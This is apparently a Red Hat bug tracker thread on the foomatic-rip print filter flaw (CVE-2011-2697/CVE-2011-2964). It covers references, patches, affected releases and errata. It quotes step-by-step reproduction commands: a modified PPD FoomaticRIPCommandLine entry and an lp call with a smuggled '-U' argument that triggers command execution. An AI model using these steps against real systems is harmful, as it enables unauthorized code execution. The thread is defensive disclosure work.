It was found that foomatic-rip universal print filter did not properly sanitize content of "files to be printed" command line argument, prior performing of the print job. A remote attacker could provide a specially-crafted PostScript Printer Description (PPD) file and trick the local user into printing it, which once performed could lead to arbitrary code execution with the privileges of the user running the foomatic-rip tool. References: [1] https://bugzilla.novell.com/show_bug.cgi?id=698451 [2] http://www.openwall.com/lists/oss-security/2011/07/13/3 (CVE Request) Proposed patch against the foomatic-rip C-source code: [3] https://bugzilla.novell.com/show_bug.cgi?id=698451#c24 Proposed patch against the foomatic-rip Perl script: [4] https://bugzilla.novell.com/show_bug.cgi?id=698451#c25
Created attachment 512673 [details] Local copy of "enhanced patch from upstream for the current C code foomatic-rip" (#c24 in Novell bugzilla) patch
Created attachment 512674 [details] Local copy of "enhanced patch from upstream for the older foomatic-rip Perl script" (#c25 in Novell bugzilla) patch
This issue affects the versions of the foomatic package, as shipped with Red Hat Enterprise Linux 4, 5, and 6. -- This issue affects the versions of the foomatic package, as shipped with Fedora release of 14 and 15. Please schedule an update.
Created foomatic tracking bugs for this issue Affects: fedora-all [bug 721008]
Further detail from Novell bugzilla [1] how to reproduce the issue (scenario would need to be modified a bit though, to successfully apply to foomatic-rip versions, shipped across Red Hat products): ============================================================================== How to reproduce with foomatic-rip: 1. Set up a queue which uses foomatic-rip i.e. use a PPD which has an "*cupsFilter: ... foomatic-rip" entry: # lpadmin -p testy2 -v file:/dev/null \ -P /usr/share/cups/model/OpenPrintingPPDs/ghostscript/Generic-PCL_5c_Printer.ljet4.ppd.gz \ -E If you don't have openSUSE 11.4 the Generic-PCL_5c_Printer.ljet4.ppd.gz is located in /usr/share/cups/model/Generic/PCL_5c_Printer-ljet4.ppd.gz 2. Get the PPD as normal user: $ wget http://localhost:631/printers/testy2.ppd ... 2011-06-07 12:38:59 (795 MB/s) - `testy2.ppd' saved [13829/13829] 3. Modify the PPD as normal user: Change the *FoomaticRIPCommandLine: entry (up to the *End line) as one likes, e.g. to this single line (without *End line: *FoomaticRIPCommandLine: "/bin/cp /etc/SuSE-release /tmp/testy2.out" 4. Print a dummy job to find out the current job id as normal user: $ echo Hello | lp -d testy2 request id is testy2-111 5. Print the malicious job as normal user: $ lp -d testy -U'-p/var/spool/cups/d00112-001' \ -o document-format=text/plain testy2.ppd request id is testy-112 6: Verify that the FoomaticRIPCommandLine was actually executed: # ls -l /tmp/testy2.out -rw------- 1 lp lp 57 Jun 7 12:40 /tmp/testy2.out # cat /tmp/testy2.out openSUSE 11.4 (x86_64) VERSION = 11.4 CODENAME = Celadon ============================================================================== And one correction regarding point 5. yet: How to reproduce with foomatic-rip: ... 5. Print the malicious job as normal user: $ lp -d testy2 -U'-p/var/spool/cups/d00112-001' \ -o document-format=text/plain testy2.ppd request id is testy2-112
The CVE identifier of CVE-2011-2697 has been assigned to this issue: http://www.openwall.com/lists/oss-security/2011/07/18/3
Created attachment 515184 [details] ppd containing cupsFilter
MITRE has assigned two CVE names here: Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2697 to the following vulnerability: Name: CVE-2011-2697 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2697 Assigned: 20110711 Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1 Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451 Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001 foomatic-rip-hplip in HP Linux Imaging and Printing (HPLIP) 3.11.5 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file. Common Vulnerabilities and Exposures assigned an identifier CVE-2011-2964 to the following vulnerability: Name: CVE-2011-2964 URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2964 Assigned: 20110729 Reference: http://www.openwall.com/lists/oss-security/2011/07/13/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/18/3 Reference: http://www.openwall.com/lists/oss-security/2011/07/28/1 Reference: https://bugzilla.novell.com/show_bug.cgi?id=698451 Reference: https://bugzilla.redhat.com/show_bug.cgi?id=721001 foomaticrip.c in foomatic-rip in foomatic-filters in Foomatic 4.0.6 allows remote attackers to execute arbitrary code via a crafted *FoomaticRIPCommandLine field in a .ppd file, a different vulnerability than CVE-2011-2697.
Looking at the description of the CVEs from above: CVE-2011-2697 is for the perl version in foomatic 3.x: Affects: rhel-4 , rhel-5 CVE-2011-2964 is for the C version in foomatic 4.x: Affects: rhel-6, Fedora
Keeping this bug for the perl issue.
This issue has been addressed in following products: Red Hat Enterprise Linux 4 Red Hat Enterprise Linux 5 Via RHSA-2011:1109 https://rhn.redhat.com/errata/RHSA-2011-1109.html